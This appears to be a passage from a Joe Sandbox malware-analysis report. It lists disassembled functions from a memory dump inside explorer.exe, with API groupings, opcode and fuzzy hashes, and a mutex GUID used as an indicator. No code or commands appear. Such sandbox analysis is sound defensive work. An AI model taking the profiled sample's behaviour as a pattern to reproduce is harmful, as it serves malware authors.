                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: c6e65f6b01b94b13fd23f4a7e6283f519103931d797bfc6ffacafbbc56e53864
                          • Instruction ID: 4b72a264ced5bfcdbe50f5d636e436b01f7a438500b399e0d823a1bb3090dbf6
                          • Opcode Fuzzy Hash: c6e65f6b01b94b13fd23f4a7e6283f519103931d797bfc6ffacafbbc56e53864
                          • Instruction Fuzzy Hash: F7014C31265E048AEB849F25F9843D573A1F789F90F446624EF5E477A4DB3CC99AC340
                          Function 011C2844 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 195467ecf0e9b39d0823af2e41b7a61e96f13688144912d81077017081ad5b3c
                          • Instruction ID: 5f30f31e1bd3662ac042f2ed7fe5fa5ae51fc6d7d7da47a1c511918fd48db1b4
                          • Opcode Fuzzy Hash: 195467ecf0e9b39d0823af2e41b7a61e96f13688144912d81077017081ad5b3c
                          • Instruction Fuzzy Hash: ECF090B271168986DE0E2B68E9D03ED7A909FB0F7AF564719D62E0B3E1C73C44418721
                          Function 011AD9ED Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 09f05515462f461276196ec69aeeb838aed65b65ebbc682e0a595f35ac473647
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 09f05515462f461276196ec69aeeb838aed65b65ebbc682e0a595f35ac473647
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD717 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 89e3dd46865cacff1dddaff1f35aeff22daad2851f05acaa26d29de09fad9b17
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 89e3dd46865cacff1dddaff1f35aeff22daad2851f05acaa26d29de09fad9b17
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD704 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 3779b9ff62c45535a73ea4ad58ab9b58cc22196be243de00855a3174e99cfd9c
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 3779b9ff62c45535a73ea4ad58ab9b58cc22196be243de00855a3174e99cfd9c
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD73D Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 3f4a609b6b85ce19b629f703ee1c45849e5e308dee8cee7de8996c57758e9cd8
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 3f4a609b6b85ce19b629f703ee1c45849e5e308dee8cee7de8996c57758e9cd8
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD72A Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 2279b9e329606f482461459331447446910ba0a7178c6b7be947a094aef3e10f
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 2279b9e329606f482461459331447446910ba0a7178c6b7be947a094aef3e10f
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD750 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: cd7f7dacfb38960633c265f37f2beb7289591d5bb6379b87ea7dbaf7eb1417f9
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: cd7f7dacfb38960633c265f37f2beb7289591d5bb6379b87ea7dbaf7eb1417f9
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD776 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: f33f5098479b61cb8784f9bdc42afecc69a11538bc06af07a78670a9932cc185
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: f33f5098479b61cb8784f9bdc42afecc69a11538bc06af07a78670a9932cc185
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD763 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: d13ebd1533689c61dbedd7e5c398c8caf9c83e98fba6a0ef91f1596ae0a7184f
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: d13ebd1533689c61dbedd7e5c398c8caf9c83e98fba6a0ef91f1596ae0a7184f
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AD65F Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$ExitProcess$EventFreeLocalObjectSingleWait
                          • String ID:
                          • API String ID: 3388663691-0
                          • Opcode ID: 154d7befebbb67ca448b3011b7ee005e36315c4a0744a47ed84eebfe96a10e49
                          • Instruction ID: 3afe1b451f24494108a2cdf6ac31eff011f5bc2a0c66bb0d0e7724f363010c78
                          • Opcode Fuzzy Hash: 154d7befebbb67ca448b3011b7ee005e36315c4a0744a47ed84eebfe96a10e49
                          • Instruction Fuzzy Hash: 58F0D038100D0982FF1DFBA5FE153D82761EBA075DF440239E62A46570DF398486C711
                          Function 011AE470 Relevance: 7.5, APIs: 5, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Uninitialize$CreateFromGuidInitializeString
                          • String ID:
                          • API String ID: 46189592-0
                          • Opcode ID: 98d1923c9e600ed36ae5589ba33196ce763fd58fc06dba7b5e299eff5153a42d
                          • Instruction ID: 45072c70474bd4514dad97535d99c68b30ffe0a16773403d8603d6cd2d72e84f
                          • Opcode Fuzzy Hash: 98d1923c9e600ed36ae5589ba33196ce763fd58fc06dba7b5e299eff5153a42d
                          • Instruction Fuzzy Hash: 03E06D323149A582EB1C7F64E8083DA2774F750B49F840029EA8AC16B5DF6DC14AC700
                          Function 011B5FB2 Relevance: 7.5, APIs: 5, Instructions: 19synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$MutexRelease
                          • String ID:
                          • API String ID: 2279609368-0
                          • Opcode ID: 243a2039e09a370efbe64ca8e91fb5a861a196b6e0ad1bf0f32ac2e1f9b342c3
                          • Instruction ID: 4f7417b323fb9d49e3c84fce8d814c7a7b06030975a7afdb36340af533c5a9ea
                          • Opcode Fuzzy Hash: 243a2039e09a370efbe64ca8e91fb5a861a196b6e0ad1bf0f32ac2e1f9b342c3
                          • Instruction Fuzzy Hash: 0AF0A531115E4082E75CAB11F8983E963B1FBC4B69F901039E78B82A74CF7DC88AC740
                          Function 011C417C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: eb0da219b1e6c698879588daba050085f6bb106e72c1d381b0551375f9195ab6
                          • Instruction ID: 2c6b256f8a53366a651994b035cf97602cae202937ad0454c5ca31646ba7becf
                          • Opcode Fuzzy Hash: eb0da219b1e6c698879588daba050085f6bb106e72c1d381b0551375f9195ab6
                          • Instruction Fuzzy Hash: 0431F522308A8185DA299B65B85079ABB61FBB5FE8F04421ADF9807F98DF28C445CB10
                          Function 011C4614 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID: 1
                          • API String ID: 2819658684-2212294583
                          • Opcode ID: ad9f0758fff27885306979df86806ac888a182690923f3c3b573b2da9f238c34
                          • Instruction ID: 40712d58433c0931927b0e3444af8e4871c03b2d21276b8f946fef61e72ba958
                          • Opcode Fuzzy Hash: ad9f0758fff27885306979df86806ac888a182690923f3c3b573b2da9f238c34
                          • Instruction Fuzzy Hash: C711066221D6E0D6EB1F8F38D57036C6E559B75F88F8AC069C74607B1AD72EC940C722
                          Function 0119EB19 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119EADE
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011D4000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291546585.00000000011F9000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291611655.00000000011FD000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1190000_explorer.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CloseHandleMutexOpen
                          • String ID: {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}
                          • API String ID: 2551712853-555727378
                          • Opcode ID: 25bec7e92827d0297fd61afa6c2a10886451f66215c2a3fb739f2a55cdae6f8b
                          • Instruction ID: af5f73ccdd18a82325b23b8a7fc1152114e5c50d3b617ca4a5305255282d8f78
                          • Opcode Fuzzy Hash: 25bec7e92827d0297fd61afa6c2a10886451f66215c2a3fb739f2a55cdae6f8b
                          • Instruction Fuzzy Hash: 43E0463120AF48C2E70CEB16E8583EA63A2F788358F044029E39783AA4DF3CC44AC751
                          Function 0119EA1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • {BBD69D41-7ECF-4B3B-8592-7E70DE12B303}, xrefs: 0119E9E4
                          Memory Dump Source
                          • Source File: 00000003.00000002.3291508536.0000000001191000.00000020.00001000.00020000.00000000.sdmp, Offset: 01190000, based on PE: true
                          • Associated: 00000003.00000002.3291495277.0000000001190000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmpDownload File
